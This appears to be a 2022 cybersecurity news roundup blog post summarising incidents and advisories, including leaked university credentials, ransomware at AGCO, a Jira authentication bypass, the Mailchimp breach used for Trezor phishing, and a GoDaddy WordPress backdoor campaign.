Cyber Victor – a leading blog on cyber security

The FBI warned on May 26, 2022 that thousands of compromised credentials harvested from US college and university networks are circulating on online crime forums in Russia and elsewhere, and could lead to subsequent cyber attacks against individual users or affiliated organizations. “Credential harvesting against an organization is often a byproduct of spear-phishing, ransomware, or other cyber intrusion tactics”, says the alert.

• As of January 2022, Russian cyber criminal forums offered for sale or posted for public access the network credentials and virtual private network accesses to a multitude of identified US-based universities and colleges across the country, some of which included screenshots as proof of access.
• In May 2021, over 36,000 email and password combinations (some of which may have been duplicates) for email accounts ending in .edu were identified on a publicly available instant messaging platform.
• In late 2020, US territory-based university account usernames and passwords with the domain .edu were found for sale on the dark web. The seller listed approximately 2,000 unique usernames with accompanying passwords.

The FBI alert offered recommendations:

• Keep all operating systems and software up to date.
• Implement user training programs and phishing exercises for students and faculty to raise awareness.
• Require strong, unique passwords for all accounts.
• Require multi-factor authentication (MFA).
• Restrict where accounts and credentials can be used.
• Segment networks to help prevent unauthorized access.
• Identify, detect, and investigate abnormal activity with network-monitoring tools.
• Use anomaly detection tools.
• Enforce principle of least privilege through authorization policies.
• Secure and closely monitor remote desktop protocol (RDP) use.
• Document external remote connections.

Read more about it here.

Agricultural machinery manufacturer giant AGCO announced that a ransomware attack impacted some of its production facilities. on May 5, 2022. “AGCO is still investigating the extent of the attack, but it is anticipated that its business operations will be adversely affected for several days and potentially longer to fully resume all services depending upon how quickly the Company is able to repair its systems” reads the announcement.

In an update provided on May 16, 2022, AGCO said: ” A majority of the affected production sites and parts operations resumed operational activities last week or today. The remainder of the sites are expected to begin operations during the balance of this week.” The Company also reported that there had been data exfiltration as a result of the ransomware cyber attack. While the Company does not have retail operations, and therefore no privacy-protected consumer data, the Company is still evaluating the scope and consequences of the data loss.

AGCO is based out of Duluth, Georgia, US, and has about 20,000 employees.

Read more about it here.

Car rental company Sixt confirmed on May 1, 2022 that it had detected “IT irregularities” on April 29, and had been subject to a cyberattack. A statement made by the company said: “Response measures were implemented immediately in accordance with pre-planned security protocols. Subsequently, it has been confirmed that Sixt SE was subject to a cyber-attack, which Sixt was able to contain at an early stage.” The statement further said: “As a standard precautionary measure, access to IT systems was immediately restricted and the pre-planned recovery processes were initiated. Many central Sixt systems, in particular the website and apps were kept up and running.”

Customers who called the company heard a recorded message telling them, “Due to a technical problem, we are currently unavailable and can only process e-mail inquiries with a delay.”

The type of attack has not been made public, and it is unclear if it was a ransomware attack. The company also declined to say whether customer or employee data was accessed during the cyberattack.

Sixt employs 7,000 people and operates about 2,000 locations across 110 countries.

Read more about it here.

Atlassian, an Australian software company that develops products for software developers, has published a security advisory to alert that its Jira and Jira Service Management products are affected by a critical authentication bypass vulnerability in Seraph, the company’s web application security framework.

Seraph is used in its Jira and Confluence products for handling all login and logout requests via a system of pluggable core elements.

The flaw is tracked as CVE-2022-0540, and comes with a severity rating of 9.9 out of 10 on the CVSS scoring system. It allows a remote attacker to bypass authentication by sending a specially crafted HTTP request to vulnerable endpoints.

The affects products are Jira Core Server, Jira Software Server, Jira Software Data Center, Jira Service Management Server, and Jira Service Management Data Center.

Only specific versions are impacted.

Users are strongly advised to update to one of the fixed versions. If this is not possible, Atlassian recommends updating the affected apps to a version that has remediated the risk, or disabling the vulnerable apps until patching is possible.

Read more about it here.

Nordex Group, one of the largest manufacturers of wind turbines, was hit by a cyberattack that forced the company to shut down some of its IT systems.

Based in Hamburg, German, Nordex designs, manufactures and sells wind turbines, employing about 8,500 people.

On April 2, 2022, the company announced that on March 31, 2022, it detected it was “subject to a cyber security incident. The intrusion was noted in an early stage and response measures initiated immediately in line with crisis management protocols. As a precautionary measure, the company decided to shut down IT systems across multiple locations and business units.”

Nordex did not disclose further technical details of the cyberattack.

Read more about it here.

Mailchimp, a veteran email marketing platform, has confirmed that hackers used an internal tool on it platform to steal data from 102 of its clients, with the data being used to send phishing emails to users of cryptocurrency services.

MailChimp have confirmed that their service has been compromised by an insider targeting crypto companies.

We have managed to take the phishing domain offline. We are trying to determine how many email addresses have been affected. 1/

— Trezor (@Trezor) April 3, 2022

The breach became more apparent when users of the Trezor hardware cryptocurrency wallet reported being targeted by sophisticated phishing emails. Trezor users received emails claimed to be from Trezor, telling them that their accounts were compromised in a data breach. The email included a link to an updated version of Trezor Suite, along with instructions on how to set up a new pin. In reality, the email was pointing to a phishing site meant to capture the contents of their digital wallets.

Users of Trezor devices have been advised to report any new phishing attempts directly to Trezor, at security@trezor.io.

Read more about it here.

On March 25, 2022, the US Federal Communications Commission (FCC) added Kaspersky and two Chinese companies to its Covered List, because it poses unacceptable risk to US national security.

“The Federal Communications Commission’s Public Safety and Homeland Security Bureau today added equipment and services from three entities – AO Kaspersky Lab, China Telecom (Americas) Corp, and China Mobile International USA Inc. – to its list of communications equipment and services that have been deemed a threat to national security, consistent with requirements in the Secure and Trusted Communications Networks Act of 2019.” reads the FCC statement.

The FCC’s decision follows an advisory released by Germany’s Federal Office of Information Security (BSI) this month against using the company’s security solutions in the country over doubts about the reliability of the manufacturer, as it still has to abide by Russian laws and regulation.

Read more about it here.

A new hacking campaign infecting hundreds of sites hosted by GoDaddy-hosted sites has been uncovered. The discovery comes from Wordfence, whose team first observed the malicious activity on March 11, 2022, with 298 websites infected by the backdoor within 24 hours, 281 of which were hosted on GoDaddy’s Managed WordPress service.

The backdoor infecting the sites is a 2015 Google search SEO-poisoning tool implanted on PHP file wp-config.php to get spam link templates from Command and Control (C2) domains that are used to inject malicious pages into search results. The campaign uses mostly pharmaceutical spam templates, served to visitors of the compromised websites instead of the actual websites content.

Users of GoDaddy’s Managed WordPress platform should scan the wp-config.php file to locate potential backdoor injections.

Read more about it here.

Internet security companies have recorded a massive wave of cyberattacks against Ukrainian WordPress sites since Russia invaded Ukraine.

Cybersecurity firm Wordfence, which protects 8,320 WordPress websites belonging to universities, government, military, and law enforcement entities in Ukraine, reported 144,000 attacks on February 25, 2022 alone, which is three times the number of daily attacks from earlier in February across the Ukrainian websites that they protect. The attacks compromised at least 30 Ukrainian university websites. The hacking group behind these attacks is a pro-Russian group called “theMx0nday”.

For the first time in its history, Wordfence has decided to automatically deploy real-time threat intelligence to all Ukrainian websites using this WordPress plugin, regardless of their subscription tier. Normally, this feature is only available to Premium customers. “We are doing this to assist in blocking cyberattacks targeting Ukraine. This update requires no action from users of the Free version of Wordfence on the UA top-level domain.” says their blog post.

Read more about it here.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) announced that it has compiled a list of free cybersecurity tools and services that can help organizations further advance their security capabilities. This living repository includes cybersecurity services provided by CISA, widely used open source tools, and free tools and services offered by private and public sector organizations across the cybersecurity community. CISA will also implement a process for organizations to submit additional free tools and services for inclusion on this list in the future.

The resources include guidelines on phishing assessment services, remote penetration tests, distributed denial-of-service (DDoS) protection, Project Shield, repositories for threat data, antivirus tools, forensics software, and backup services, among others.

CISO doesn’t endorse the resources for specific use case, so organizations would need to evaluate the tools and services listed to determine if they meet their needs.

Read more about it here.